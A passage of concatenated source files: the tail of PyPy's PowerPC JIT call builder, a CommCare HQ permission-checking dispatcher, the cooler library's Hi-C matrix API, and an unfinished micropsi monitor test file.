r.f8, r.f9, r.f10, r.f11, r.f12, r.f13]
RSHADOWPTR = r.RCS1
RFASTGILPTR = r.RCS2
RSHADOWOLD = r.RCS3
def __init__(self, assembler, fnloc, arglocs, resloc):
AbstractCallBuilder.__init__(self, assembler, fnloc, arglocs,
resloc, restype=INT, ressize=None)
def prepare_arguments(self):
assert IS_PPC_64
self.subtracted_to_sp = 0
# Prepare arguments. Note that this follows the convention where
# a prototype is in scope, and doesn't take "..." arguments. If
# you were to call a C function with a "..." argument with cffi,
# it would not go there but instead via libffi. If you pretend
# instead that it takes fixed arguments, then it would arrive here
# but the convention is bogus for floating-point arguments. (And,
# to add to the mess, at least CPython's ctypes cannot be used
# to call a "..." function with floating-point arguments. As I
# guess that it's a problem with libffi, it means PyPy inherits
# the same problem.)
arglocs = self.arglocs
num_args = len(arglocs)
non_float_locs = []
non_float_regs = []
float_locs = []
for i in range(min(num_args, 8)):
if arglocs[i].type != FLOAT:
non_float_locs.append(arglocs[i])
non_float_regs.append(self.GPR_ARGS[i])
else:
float_locs.append(arglocs[i])
# now 'non_float_locs' and 'float_locs' together contain the
# locations of the first 8 arguments
if num_args > 8:
# We need to make a larger PPC stack frame, as shown on the
# picture in arch.py. It needs to be 48 bytes + 8 * num_args.
# The new SP back chain location should point to the top of
# the whole stack frame, i.e. jumping over both the existing
# fixed-sise part and the new variable-sized part.
base = PARAM_SAVE_AREA_OFFSET
varsize = base + 8 * num_args
varsize = (varsize + 15) & ~15 # align
self.mc.load(r.SCRATCH2.value, r.SP.value, 0) # SP back chain
self.mc.store_update(r.SCRATCH2.value, r.SP.value, -varsize)
self.subtracted_to_sp = varsize
# In this variable-sized part, only the arguments from the 8th
# one need to be written, starting at SP + 112
for n in range(8, num_args):
loc = arglocs[n]
if loc.type != FLOAT:
# after the 8th argument, a non-float location is
# always stored in the stack
if loc.is_reg():
src = loc
else:
src = r.r2
self.asm.regalloc_mov(loc, src)
self.mc.std(src.value, r.SP.value, base + 8 * n)
else:
# the first 13 floating-point arguments are all passed
# in the registers f1 to f13, independently on their
# index in the complete list of arguments
if len(float_locs) < len(self.FPR_ARGS):
float_locs.append(loc)
else:
if loc.is_fp_reg():
src = loc
else:
src = r.FP_SCRATCH
self.asm.regalloc_mov(loc, src)
self.mc.stfd(src.value, r.SP.value, base + 8 * n)
# We must also copy fnloc into FNREG
non_float_locs.append(self.fnloc)
non_float_regs.append(self.mc.RAW_CALL_REG)
if float_locs:
assert len(float_locs) <= len(self.FPR_ARGS)
remap_frame_layout(self.asm, float_locs,
self.FPR_ARGS[:len(float_locs)],
r.FP_SCRATCH)
remap_frame_layout(self.asm, non_float_locs, non_float_regs,
r.SCRATCH)
def push_gcmap(self):
# we push *now* the gcmap, describing the status of GC registers
# after the rearrangements done just before, ignoring the return
# value r3, if necessary
assert not self.is_call_release_gil
noregs = self.asm.cpu.gc_ll_descr.is_shadow_stack()
gcmap = self.asm._regalloc.get_gcmap([r.r3], noregs=noregs)
self.asm.push_gcmap(self.mc, gcmap, store=True)
def pop_gcmap(self):
ssreg = None
gcrootmap = self.asm.cpu.gc_ll_descr.gcrootmap
if gcrootmap:
if gcrootmap.is_shadow_stack and self.is_call_release_gil:
# in this mode, RSHADOWOLD happens to contain the shadowstack
# top at this point, so reuse it instead of loading it again
ssreg = self.RSHADOWOLD
self.asm._reload_frame_if_necessary(self.mc, shadowstack_reg=ssreg)
def emit_raw_call(self):
self.mc.raw_call()
def restore_stack_pointer(self):
if self.subtracted_to_sp != 0:
self.mc.addi(r.SP.value, r.SP.value, self.subtracted_to_sp)
def load_result(self):
assert (self.resloc is None or
self.resloc is r.r3 or
self.resloc is r.f1)
def call_releasegil_addr_and_move_real_arguments(self, fastgil):
assert self.is_call_release_gil
RSHADOWPTR = self.RSHADOWPTR
RFASTGILPTR = self.RFASTGILPTR
RSHADOWOLD = self.RSHADOWOLD
#
# Save this thread's shadowstack pointer into r29, for later comparison
gcrootmap = self.asm.cpu.gc_ll_descr.gcrootmap
if gcrootmap:
if gcrootmap.is_shadow_stack:
rst = gcrootmap.get_root_stack_top_addr()
self.mc.load_imm(RSHADOWPTR, rst)
self.mc.load(RSHADOWOLD.value, RSHADOWPTR.value, 0)
#
# change 'rpy_fastgil' to 0 (it should be non-zero right now)
self.mc.load_imm(RFASTGILPTR, fastgil)
self.mc.li(r.r0.value, 0)
self.mc.lwsync()
self.mc.std(r.r0.value, RFASTGILPTR.value, 0)
#
if not we_are_translated(): # for testing: we should not access
self.mc.addi(r.SPP.value, r.SPP.value, 1) # r31 any more
def move_real_result_and_call_reacqgil_addr(self, fastgil):
from rpython.jit.backend.ppc.codebuilder import OverwritingBuilder
# try to reacquire the lock. The following registers are still
# valid from before the call:
RSHADOWPTR = self.RSHADOWPTR # r30: &root_stack_top
RFASTGILPTR = self.RFASTGILPTR # r29: &fastgil
RSHADOWOLD = self.RSHADOWOLD # r28: previous val of root_stack_top
# Equivalent of 'r10 = __sync_lock_test_and_set(&rpy_fastgil, 1);'
self.mc.li(r.r9.value, 1)
retry_label = self.mc.currpos()
self.mc.ldarx(r.r10.value, 0, RFASTGILPTR.value) # load the lock value
self.mc.stdcxx(r.r9.value, 0, RFASTGILPTR.value) # try to claim lock
self.mc.bc(6, 2, retry_label - self.mc.currpos()) # retry if failed
self.mc.isync()
self.mc.cmpdi(0, r.r10.value, 0)
b1_location = self.mc.currpos()
self.mc.trap() # boehm: patched with a BEQ: jump if r10 is zero
# shadowstack: patched with BNE instead
if self.asm.cpu.gc_ll_descr.gcrootmap:
# When doing a call_release_gil with shadowstack, there
# is the risk that the 'rpy_fastgil' was free but the
# current shadowstack can be the one of a different
# thread. So here we check if the shadowstack pointer
# is still the same as before we released the GIL (saved
# in RSHADOWOLD), and if not, we fall back to 'reacqgil_addr'.
self.mc.load(r.r9.value, RSHADOWPTR.value, 0)
self.mc.cmpdi(0, r.r9.value, RSHADOWOLD.value)
bne_location = b1_location
b1_location = self.mc.currpos()
self.mc.trap()
# revert the rpy_fastgil acquired above, so that the
# general 'reacqgil_addr' below can acquire it again...
# (here, r10 is conveniently zero)
self.mc.std(r.r10.value, RFASTGILPTR.value, 0)
pmc = OverwritingBuilder(self.mc, bne_location, 1)
pmc.bne(self.mc.currpos() - bne_location)
pmc.overwrite()
#
# Yes, we need to call the reacqgil() function.
# save the result we just got
RSAVEDRES = RFASTGILPTR # can reuse this reg here
reg = self.resloc
if reg is not None:
if reg.is_core_reg():
self.mc.mr(RSAVEDRES.value, reg.value)
elif reg.is_fp_reg():
self.mc.stfd(reg.value, r.SP.value,
PARAM_SAVE_AREA_OFFSET + 7 * WORD)
self.mc.load_imm(self.mc.RAW_CALL_REG, self.asm.reacqgil_addr)
self.mc.raw_call()
if reg is not None:
if reg.is_core_reg():
self.mc.mr(reg.value, RSAVEDRES.value)
elif reg.is_fp_reg():
self.mc.lfd(reg.value, r.SP.value,
PARAM_SAVE_AREA_OFFSET + 7 * WORD)
# replace b1_location with BEQ(here)
pmc = OverwritingBuilder(self.mc, b1_location, 1)
pmc.beq(self.mc.currpos() - b1_location)
pmc.overwrite()
if not we_are_translated(): # for testing: now we can access
self.mc.addi(r.SPP.value, r.SPP.value, -1) # r31 again
def write_real_errno(self, save_err):
if save_err & rffi.RFFI_READSAVED_ERRNO:
# Just before a call, read '*_errno' and write it into the
# real 'errno'. A lot of registers are free here, notably
# r11 and r0.
if save_err & rffi.RFFI_ALT_ERRNO:
rpy_errno = llerrno.get_alt_errno_offset(self.asm.cpu)
else:
rpy_errno = llerrno.get_rpy_errno_offset(self.asm.cpu)
p_errno = llerrno.get_p_errno_offset(self.asm.cpu)
self.mc.ld(r.r11.value, r.SP.value,
THREADLOCAL_ADDR_OFFSET + self.subtracted_to_sp)
self.mc.lwz(r.r0.value, r.r11.value, rpy_errno)
self.mc.ld(r.r11.value, r.r11.value, p_errno)
self.mc.stw(r.r0.value, r.r11.value, 0)
elif save_err & rffi.RFFI_ZERO_ERRNO_BEFORE:
# Same, but write zero.
p_errno = llerrno.get_p_errno_offset(self.asm.cpu)
self.mc.ld(r.r11.value, r.SP.value,
THREADLOCAL_ADDR_OFFSET + self.subtracted_to_sp)
self.mc.ld(r.r11.value, r.r11.value, p_errno)
self.mc.li(r.r0.value, 0)
self.mc.stw(r.r0.value, r.r11.value, 0)
def read_real_errno(self, save_err):
if save_err & rffi.RFFI_SAVE_ERRNO:
# Just after a call, read the real 'errno' and save a copy of
# it inside our thread-local '*_errno'. Registers r4-r10
# never contain anything after the call.
if save_err & rffi.RFFI_ALT_ERRNO:
rpy_errno = llerrno.get_alt_errno_offset(self.asm.cpu)
else:
rpy_errno = llerrno.get_rpy_errno_offset(self.asm.cpu)
p_errno = llerrno.get_p_errno_offset(self.asm.cpu)
self.mc.ld(r.r9.value, r.SP.value, THREADLOCAL_ADDR_OFFSET)
self.mc.ld(r.r10.value, r.r9.value, p_errno)
self.mc.lwz(r.r10.value, r.r10.value, 0)
self.mc.stw(r.r10.value, r.r9.value, rpy_errno)
|
corehq/apps/data_interfaces/dispatcher.py | akashkj/commcare-hq | 471 | 11086839 | from django.utils.decorators import method_decorator
from django_prbac.utils import has_privilege
from corehq import privileges
from corehq.apps.accounting.decorators import requires_privilege_with_fallback
from corehq.apps.reports.dispatcher import ReportDispatcher, datespan_default
from corehq.apps.users.decorators import require_permission
from corehq.apps.users.models import Permissions
require_can_edit_data = require_permission(Permissions.edit_data)
require_form_management_privilege = requires_privilege_with_fallback(privileges.DATA_CLEANUP)
class EditDataInterfaceDispatcher(ReportDispatcher):
prefix = 'edit_data_interface'
map_name = 'EDIT_DATA_INTERFACES'
@method_decorator(require_can_edit_data)
@datespan_default
def dispatch(self, request, *args, **kwargs):
from corehq.apps.case_importer.base import ImportCases
from .interfaces import BulkFormManagementInterface
if kwargs['report_slug'] == ImportCases.slug:
return self.bulk_import_case_dispatch(request, *args, **kwargs)
elif (kwargs['report_slug'] == BulkFormManagementInterface.slug and
not kwargs.get('skip_permissions_check')):
return self.bulk_form_management_dispatch(request, *args, **kwargs)
return super(EditDataInterfaceDispatcher, self).dispatch(request, *args, **kwargs)
@method_decorator(requires_privilege_with_fallback(privileges.BULK_CASE_MANAGEMENT))
def bulk_import_case_dispatch(self, request, *args, **kwargs):
return super(EditDataInterfaceDispatcher, self).dispatch(request, *args, **kwargs)
@method_decorator(require_form_management_privilege)
def bulk_form_management_dispatch(self, request, *args, **kwargs):
return super(EditDataInterfaceDispatcher, self).dispatch(request, *args, **kwargs)
def permissions_check(self, report, request, domain=None, is_navigation_check=False):
if is_navigation_check:
from corehq.apps.case_importer.base import ImportCases
from corehq.apps.data_interfaces.interfaces import BulkFormManagementInterface
report_name = report.split('.')[-1]
if report_name == ImportCases.__name__:
if not has_privilege(request, privileges.BULK_CASE_MANAGEMENT):
return False
if report_name == BulkFormManagementInterface.__name__:
if not has_privilege(request, privileges.DATA_CLEANUP):
return False
return request.couch_user.can_edit_data(domain)
|
cooler/api.py | mimakaev/cooler | 106 | 11086873 | # -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function
import simplejson as json
import six
import os
from pandas.api.types import is_integer_dtype
from scipy.sparse import coo_matrix
import numpy as np
import pandas as pd
import h5py
from .core import (
get,
region_to_offset,
region_to_extent,
RangeSelector1D,
RangeSelector2D,
CSRReader,
query_rect,
)
from .util import parse_cooler_uri, parse_region, open_hdf5, closing_hdf5
from .fileops import list_coolers
__all__ = ["Cooler", "annotate"]
# The 4DN data portal and hic2cool store these weight vectors in divisive form
_4DN_DIVISIVE_WEIGHTS = {"KR", "VC", "VC_SQRT"}
class Cooler(object):
"""
A convenient interface to a cooler data collection.
Parameters
----------
store : str, :py:class:`h5py.File` or :py:class:`h5py.Group`
Path to a cooler file, URI string, or open handle to the root HDF5
group of a cooler data collection.
root : str, optional [deprecated]
HDF5 Group path to root of cooler group if ``store`` is a file.
This option is deprecated. Instead, use a URI string of the form
:file:`<file_path>::<group_path>`.
kwargs : optional
Options to be passed to :py:class:`h5py.File()` upon every access.
By default, the file is opened with the default driver and mode='r'.
Notes
-----
If ``store`` is a file path, the file will be opened temporarily in
when performing operations. This allows :py:class:`Cooler` objects to be
serialized for multiprocess and distributed computations.
Metadata is accessible as a dictionary through the :py:attr:`info`
property.
Table selectors, created using :py:meth:`chroms`, :py:meth:`bins`, and
:py:meth:`pixels`, perform range queries over table rows,
returning :py:class:`pd.DataFrame` and :py:class:`pd.Series`.
A matrix selector, created using :py:meth:`matrix`, performs 2D matrix
range queries, returning :py:class:`numpy.ndarray` or
:py:class:`scipy.sparse.coo_matrix`.
"""
def __init__(self, store, root=None, **kwargs):
if isinstance(store, six.string_types):
if root is None:
self.filename, self.root = parse_cooler_uri(store)
elif h5py.is_hdf5(store):
with open_hdf5(store, **kwargs) as h5:
self.filename = h5.file.filename
self.root = root
else:
raise ValueError("Not a valid path to a Cooler file")
self.uri = self.filename + "::" + self.root
self.store = self.filename
self.open_kws = kwargs
else:
# Assume an open HDF5 handle, ignore open_kws
self.filename = store.file.filename
self.root = store.name
self.uri = self.filename + "::" + self.root
self.store = store.file
self.open_kws = {}
self._refresh()
def _refresh(self):
try:
with open_hdf5(self.store, **self.open_kws) as h5:
grp = h5[self.root]
_ct = chroms(grp)
_ct["name"] = _ct["name"].astype(object)
self._chromsizes = _ct.set_index("name")["length"]
self._chromids = dict(zip(_ct["name"], range(len(_ct))))
self._info = info(grp)
mode = self._info.get("storage-mode", u"symmetric-upper")
self._is_symm_upper = mode == u"symmetric-upper"
except KeyError:
err_msg = "No cooler found at: {}.".format(self.store)
listing = list_coolers(self.store)
if len(listing):
err_msg += (
" Coolers found in {}. ".format(listing)
+ "Use '::' to specify a group path"
)
raise KeyError(err_msg)
def _load_dset(self, path):
with open_hdf5(self.store, **self.open_kws) as h5:
grp = h5[self.root]
return grp[path][:]
def _load_attrs(self, path):
with open_hdf5(self.store, **self.open_kws) as h5:
grp = h5[self.root]
return dict(grp[path].attrs)
def open(self, mode="r", **kwargs):
""" Open the HDF5 group containing the Cooler with :py:mod:`h5py`
Functions as a context manager. Any ``open_kws`` passed during
construction are ignored.
Parameters
----------
mode : str, optional [default: 'r']
* ``'r'`` (readonly)
* ``'r+'`` or ``'a'`` (read/write)
Notes
-----
For other parameters, see :py:class:`h5py.File`.
"""
grp = h5py.File(self.filename, mode, **kwargs)[self.root]
return closing_hdf5(grp)
@property
def storage_mode(self):
"""Indicates whether ordinary sparse matrix encoding is used
(``"square"``) or whether a symmetric matrix is encoded by storing only
the upper triangular elements (``"symmetric-upper"``).
"""
return self._info.get("storage-mode", u"symmetric-upper")
@property
def binsize(self):
""" Resolution in base pairs if uniform else None """
return self._info["bin-size"]
@property
def chromsizes(self):
""" Ordered mapping of reference sequences to their lengths in bp """
return self._chromsizes
@property
def chromnames(self):
""" List of reference sequence names """
return list(self._chromsizes.index)
def offset(self, region):
""" Bin ID containing the left end of a genomic region
Parameters
----------
region : str or tuple
Genomic range
Returns
-------
int
Examples
--------
>>> c.offset('chr3') # doctest: +SKIP
1311
"""
with open_hdf5(self.store, **self.open_kws) as h5:
grp = h5[self.root]
return region_to_offset(
grp, self._chromids, parse_region(region, self._chromsizes)
)
def extent(self, region):
""" Bin IDs containing the left and right ends of a genomic region
Parameters
----------
region : str or tuple
Genomic range
Returns
-------
2-tuple of ints
Examples
--------
>>> c.extent('chr3') # doctest: +SKIP
(1311, 2131)
"""
with open_hdf5(self.store, **self.open_kws) as h5:
grp = h5[self.root]
return region_to_extent(
grp, self._chromids, parse_region(region, self._chromsizes)
)
@property
def info(self):
""" File information and metadata
Returns
-------
dict
"""
with open_hdf5(self.store, **self.open_kws) as h5:
grp = h5[self.root]
return info(grp)
@property
def shape(self):
return (self._info["nbins"],) * 2
def chroms(self, **kwargs):
""" Chromosome table selector
Returns
-------
Table selector
"""
def _slice(fields, lo, hi):
with open_hdf5(self.store, **self.open_kws) as h5:
grp = h5[self.root]
return chroms(grp, lo, hi, fields, **kwargs)
return RangeSelector1D(None, _slice, None, self._info["nchroms"])
def bins(self, **kwargs):
""" Bin table selector
Returns
-------
Table selector
"""
def _slice(fields, lo, hi):
with open_hdf5(self.store, **self.open_kws) as h5:
grp = h5[self.root]
return bins(grp, lo, hi, fields, **kwargs)
def _fetch(region):
with open_hdf5(self.store, **self.open_kws) as h5:
grp = h5[self.root]
return region_to_extent(
grp, self._chromids, parse_region(region, self._chromsizes)
)
return RangeSelector1D(None, _slice, _fetch, self._info["nbins"])
def pixels(self, join=False, **kwargs):
""" Pixel table selector
Parameters
----------
join : bool, optional
Whether to expand bin ID columns into chrom, start, and end
columns. Default is ``False``.
Returns
-------
Table selector
"""
def _slice(fields, lo, hi):
with open_hdf5(self.store, **self.open_kws) as h5:
grp = h5[self.root]
return pixels(grp, lo, hi, fields, join, **kwargs)
def _fetch(region):
with open_hdf5(self.store, **self.open_kws) as h5:
grp = h5[self.root]
i0, i1 = region_to_extent(
grp, self._chromids, parse_region(region, self._chromsizes)
)
lo = grp["indexes"]["bin1_offset"][i0]
hi = grp["indexes"]["bin1_offset"][i1]
return lo, hi
return RangeSelector1D(None, _slice, _fetch, self._info["nnz"])
def matrix(
self,
field=None,
balance=True,
sparse=False,
as_pixels=False,
join=False,
ignore_index=True,
divisive_weights=None,
max_chunk=500000000,
):
""" Contact matrix selector
Parameters
----------
field : str, optional
Which column of the pixel table to fill the matrix with. By
default, the 'count' column is used.
balance : bool, optional
Whether to apply pre-calculated matrix balancing weights to the
selection. Default is True and uses a column named 'weight'.
Alternatively, pass the name of the bin table column containing
the desired balancing weights. Set to False to return untransformed
counts.
sparse: bool, optional
Return a scipy.sparse.coo_matrix instead of a dense 2D numpy array.
as_pixels: bool, optional
Return a DataFrame of the corresponding rows from the pixel table
instead of a rectangular sparse matrix. False by default.
join : bool, optional
If requesting pixels, specifies whether to expand the bin ID
columns into (chrom, start, end). Has no effect when requesting a
rectangular matrix. Default is True.
ignore_index : bool, optional
If requesting pixels, don't populate the index column with the
pixel IDs to improve performance. Default is True.
divisive_weights : bool, optional
Force balancing weights to be interpreted as divisive (True) or
multiplicative (False). Weights are always assumed to be
multiplicative by default unless named KR, VC or SQRT_VC, in which
case they are assumed to be divisive by default.
Returns
-------
Matrix selector
Notes
-----
If ``as_pixels=True``, only data explicitly stored in the pixel table
will be returned: if the cooler's storage mode is symmetric-upper,
lower triangular elements will not be generated. If
``as_pixels=False``, those missing non-zero elements will
automatically be filled in.
"""
if balance in _4DN_DIVISIVE_WEIGHTS and divisive_weights is None:
divisive_weights = True
def _slice(field, i0, i1, j0, j1):
with open_hdf5(self.store, **self.open_kws) as h5:
grp = h5[self.root]
return matrix(
grp,
i0,
i1,
j0,
j1,
field,
balance,
sparse,
as_pixels,
join,
ignore_index,
divisive_weights,
max_chunk,
self._is_symm_upper,
)
def _fetch(region, region2=None):
with open_hdf5(self.store, **self.open_kws) as h5:
grp = h5[self.root]
if region2 is None:
region2 = region
region1 = parse_region(region, self._chromsizes)
region2 = parse_region(region2, self._chromsizes)
i0, i1 = region_to_extent(grp, self._chromids, region1)
j0, j1 = region_to_extent(grp, self._chromids, region2)
return i0, i1, j0, j1
return RangeSelector2D(field, _slice, _fetch, (self._info["nbins"],) * 2)
def __repr__(self):
if isinstance(self.store, six.string_types):
filename = os.path.basename(self.store)
container = "{}::{}".format(filename, self.root)
else:
container = repr(self.store)
return '<Cooler "{}">'.format(container)
def info(h5):
"""
File and user metadata dict.
Parameters
----------
h5 : :py:class:`h5py.File` or :py:class:`h5py.Group`
Open handle to cooler file.
Returns
-------
dict
"""
d = {}
for k, v in h5.attrs.items():
if isinstance(v, six.string_types):
try:
v = json.loads(v)
except ValueError:
pass
d[k] = v
return d
def chroms(h5, lo=0, hi=None, fields=None, **kwargs):
"""
Table describing the chromosomes/scaffolds/contigs used.
They appear in the same order they occur in the heatmap.
Parameters
----------
h5 : :py:class:`h5py.File` or :py:class:`h5py.Group`
Open handle to cooler file.
lo, hi : int, optional
Range of rows to select from the table.
fields : sequence of str, optional
Subset of columns to select from table.
Returns
-------
:py:class:`DataFrame`
"""
if fields is None:
fields = (
pd.Index(["name", "length"])
.append(pd.Index(h5["chroms"].keys()))
.drop_duplicates()
)
return get(h5["chroms"], lo, hi, fields, **kwargs)
def bins(h5, lo=0, hi=None, fields=None, **kwargs):
"""
Table describing the genomic bins that make up the axes of the heatmap.
Parameters
----------
h5 : :py:class:`h5py.File` or :py:class:`h5py.Group`
Open handle to cooler file.
lo, hi : int, optional
Range of rows to select from the table.
fields : sequence of str, optional
Subset of columns to select from table.
Returns
-------
:py:class:`DataFrame`
"""
if fields is None:
fields = (
pd.Index(["chrom", "start", "end"])
.append(pd.Index(h5["bins"].keys()))
.drop_duplicates()
)
# If convert_enum is not explicitly set to False, chrom IDs will get
# converted to categorical chromosome names, provided the ENUM header
# exists in bins/chrom. Otherwise, they will return as integers.
out = get(h5["bins"], lo, hi, fields, **kwargs)
# Handle the case where the ENUM header doesn't exist but we want to
# convert integer chrom IDs to categorical chromosome names.
if "chrom" in fields:
convert_enum = kwargs.get("convert_enum", True)
if isinstance(fields, six.string_types):
chrom_col = out
else:
chrom_col = out["chrom"]
if is_integer_dtype(chrom_col.dtype) and convert_enum:
chromnames = chroms(h5, fields="name")
chrom_col = pd.Categorical.from_codes(chrom_col, chromnames, ordered=True)
if isinstance(fields, six.string_types):
out = pd.Series(chrom_col, out.index)
else:
out["chrom"] = chrom_col
return out
def pixels(h5, lo=0, hi=None, fields=None, join=True, **kwargs):
"""
Table describing the nonzero upper triangular pixels of the Hi-C contact
heatmap.
Parameters
----------
h5 : :py:class:`h5py.File` or :py:class:`h5py.Group`
Open handle to cooler file.
lo, hi : int, optional
Range of rows to select from the table.
fields : sequence of str, optional
Subset of columns to select from table.
join : bool, optional
Whether or not to expand bin ID columns to their full bin description
(chrom, start, end). Default is True.
Returns
-------
:py:class:`DataFrame`
"""
if fields is None:
fields = (
pd.Index(["bin1_id", "bin2_id"])
.append(pd.Index(h5["pixels"].keys()))
.drop_duplicates()
)
df = get(h5["pixels"], lo, hi, fields, **kwargs)
if join:
bins = get(h5["bins"], 0, None, ["chrom", "start", "end"], **kwargs)
df = annotate(df, bins, replace=True)
return df
def annotate(pixels, bins, replace=False):
"""
Add bin annotations to a data frame of pixels.
This is done by performing a relational "join" against the bin IDs of a
table that describes properties of the genomic bins. New columns will be
appended on the left of the output data frame.
.. versionchanged:: 0.8.0
The default value of ``replace`` changed to False.
Parameters
----------
pixels : :py:class:`DataFrame`
A data frame containing columns named ``bin1_id`` and/or ``bin2_id``.
If columns ``bin1_id`` and ``bin2_id`` are both present in ``pixels``,
the adjoined columns will be suffixed with '1' and '2' accordingly.
bins : :py:class:`DataFrame` or DataFrame selector
Data structure that contains a full description of the genomic bins of
the contact matrix, where the index corresponds to bin IDs.
replace : bool, optional
Remove the original ``bin1_id`` and ``bin2_id`` columns from the
output. Default is False.
Returns
-------
:py:class:`DataFrame`
"""
columns = pixels.columns
ncols = len(columns)
if "bin1_id" in columns:
if len(bins) > len(pixels):
bin1 = pixels["bin1_id"]
lo = bin1.min()
hi = bin1.max() + 1
lo = 0 if np.isnan(lo) else lo
hi = 0 if np.isnan(hi) else hi
right = bins[lo:hi]
else:
right = bins[:]
pixels = pixels.merge(right, how="left", left_on="bin1_id", right_index=True)
if "bin2_id" in columns:
if len(bins) > len(pixels):
bin2 = pixels["bin2_id"]
lo = bin2.min()
hi = bin2.max() + 1
lo = 0 if np.isnan(lo) else lo
hi = 0 if np.isnan(hi) else hi
right = bins[lo:hi]
else:
right = bins[:]
pixels = pixels.merge(
right, how="left", left_on="bin2_id", right_index=True, suffixes=("1", "2")
)
# rearrange columns
pixels = pixels[list(pixels.columns[ncols:]) + list(pixels.columns[:ncols])]
# drop bin IDs
if replace:
cols_to_drop = [col for col in ("bin1_id", "bin2_id") if col in columns]
pixels = pixels.drop(cols_to_drop, axis=1)
return pixels
def matrix(
h5,
i0,
i1,
j0,
j1,
field=None,
balance=True,
sparse=False,
as_pixels=False,
join=True,
ignore_index=True,
divisive_weights=False,
max_chunk=500000000,
is_upper=True,
):
"""
Two-dimensional range query on the Hi-C contact heatmap.
Depending on the options, returns either a 2D NumPy array, a rectangular
sparse ``coo_matrix``, or a data frame of pixels.
Parameters
----------
h5 : :py:class:`h5py.File` or :py:class:`h5py.Group`
Open handle to cooler file.
i0, i1 : int, optional
Bin range along the 0th (row) axis of the heatap.
j0, j1 : int, optional
Bin range along the 1st (col) axis of the heatap.
field : str, optional
Which column of the pixel table to fill the matrix with. By default,
the 'count' column is used.
balance : bool, optional
Whether to apply pre-calculated matrix balancing weights to the
selection. Default is True and uses a column named 'weight'.
Alternatively, pass the name of the bin table column containing the
desired balancing weights. Set to False to return untransformed counts.
sparse: bool, optional
Return a scipy.sparse.coo_matrix instead of a dense 2D numpy array.
as_pixels: bool, optional
Return a DataFrame of the corresponding rows from the pixel table
instead of a rectangular sparse matrix. False by default.
join : bool, optional
If requesting pixels, specifies whether to expand the bin ID columns
into (chrom, start, end). Has no effect when requesting a rectangular
matrix. Default is True.
ignore_index : bool, optional
If requesting pixels, don't populate the index column with the pixel
IDs to improve performance. Default is True.
Returns
-------
ndarray, coo_matrix or DataFrame
Notes
-----
If ``as_pixels=True``, only data explicitly stored in the pixel table
will be returned: if the cooler's storage mode is symmetric-upper,
lower triangular elements will not be generated. If ``as_pixels=False``,
those missing non-zero elements will automatically be filled in.
"""
if field is None:
field = "count"
if isinstance(balance, str):
name = balance
elif balance:
name = "weight"
if balance and name not in h5["bins"]:
raise ValueError(
"No column 'bins/{}'".format(name)
+ "found. Use ``cooler.balance_cooler`` to "
+ "calculate balancing weights or set balance=False."
)
if as_pixels:
reader = CSRReader(h5, field, max_chunk)
index = None if ignore_index else reader.index_col(i0, i1, j0, j1)
i, j, v = reader.query(i0, i1, j0, j1)
cols = ["bin1_id", "bin2_id", field]
df = pd.DataFrame(dict(zip(cols, [i, j, v])), columns=cols, index=index)
if balance:
weights = Cooler(h5).bins()[[name]]
df2 = annotate(df, weights, replace=False)
if divisive_weights:
df2[name + "1"] = 1 / df2[name + "1"]
df2[name + "2"] = 1 / df2[name + "2"]
df["balanced"] = df2[name + "1"] * df2[name + "2"] * df2[field]
if join:
bins = Cooler(h5).bins()[["chrom", "start", "end"]]
df = annotate(df, bins, replace=True)
return df
elif sparse:
reader = CSRReader(h5, field, max_chunk)
if is_upper:
i, j, v = query_rect(reader.query, i0, i1, j0, j1, duplex=True)
else:
i, j, v = reader.query(i0, i1, j0, j1)
mat = coo_matrix((v, (i - i0, j - j0)), (i1 - i0, j1 - j0))
if balance:
weights = h5["bins"][name]
bias1 = weights[i0:i1]
bias2 = bias1 if (i0, i1) == (j0, j1) else weights[j0:j1]
if divisive_weights:
bias1 = 1 / bias1
bias2 = 1 / bias2
mat.data = bias1[mat.row] * bias2[mat.col] * mat.data
return mat
else:
reader = CSRReader(h5, field, max_chunk)
if is_upper:
i, j, v = query_rect(reader.query, i0, i1, j0, j1, duplex=True)
else:
i, j, v = reader.query(i0, i1, j0, j1)
arr = coo_matrix((v, (i - i0, j - j0)), (i1 - i0, j1 - j0)).toarray()
if balance:
weights = h5["bins"][name]
bias1 = weights[i0:i1]
bias2 = bias1 if (i0, i1) == (j0, j1) else weights[j0:j1]
if divisive_weights:
bias1 = 1 / bias1
bias2 = 1 / bias2
arr = arr * np.outer(bias1, bias2)
return arr
|
micropsi_core/tests/test_runtime_monitors.py | joschabach/micropsi2 | 119 | 11086884 | #!/usr/local/bin/python
# -*- coding: utf-8 -*-
"""
Basic tests for monitor api
"""
import pytest
from micropsi_core import runtime as micropsi
def test_add_gate_monitor(fixed_nodenet):
uid = micropsi.add_gate_monitor(fixed_nodenet, 'n0001', 'gen', sheaf='default')
monitor = micropsi.nodenets[fixed_nodenet].get_monitor(uid)
assert monitor.name == 'gate gen @ Node A1'
assert monitor.node_uid == 'n0001'
assert monitor.target == 'gen'
assert monitor.type == 'gate'
assert monitor.sheaf == 'default'
assert monitor.color.startswith('#')
assert len(monitor.values) == 0
micropsi.step_nodenet(fixed_nodenet)
monitor = micropsi.nodenets[fixed_nodenet].get_monitor(uid)
assert len(monitor.values) == 1
@pytest.mark.engine("dict_engine")
def test_add_slot_monitor(fixed_nodenet):
uid = micropsi.add_slot_monitor(fixed_nodenet, 'n0001', 'gen', name="FooBarMonitor", color="#112233")
monitor = micropsi.nodenets[fixed_nodenet].get_monitor(uid)
assert monitor.name == 'FooBarMonitor'
assert monitor.node_uid == 'n0001'
assert monitor.target == 'gen'
assert monitor.type == 'slot'
assert monitor.color == '#112233'
assert len(monitor.values) == 0
micropsi.step_nodenet(fixed_nodenet)
monitor = micropsi.nodenets[fixed_nodenet].get_monitor(uid)
assert len(monitor.values) == 1
def test_add_link_monitor(fixed_nodenet):
uid = micropsi.add_link_monitor(fixed_nodenet, 'n0005', 'gen', 'n0003', 'gen', 'weight', 'Testmonitor', color="#112233")
monitor = micropsi.nodenets[fixed_nodenet].get_monitor(uid)
assert monitor.name == 'Testmonitor'
assert monitor.property == 'weight'
assert monitor.source_node_uid == 'n0005'
assert monitor.target_node_uid == 'n0003'
assert monitor.gate_type == 'gen'
assert monitor.slot_type == 'gen'
assert monitor.color == "#112233"
assert len(monitor.values) == 0
micropsi.step_nodenet(fixed_nodenet)
monitor = micropsi.nodenets[fixed_nodenet].get_monitor(uid)
assert round(monitor.values[1], 2) == 1
micropsi.nodenets[fixed_nodenet].set_link_weight('n0005', 'gen', 'n0003', 'gen', weight=0.7)
micropsi.step_nodenet(fixed_nodenet)
monitor = micropsi.nodenets[fixed_nodenet].get_monitor(uid)
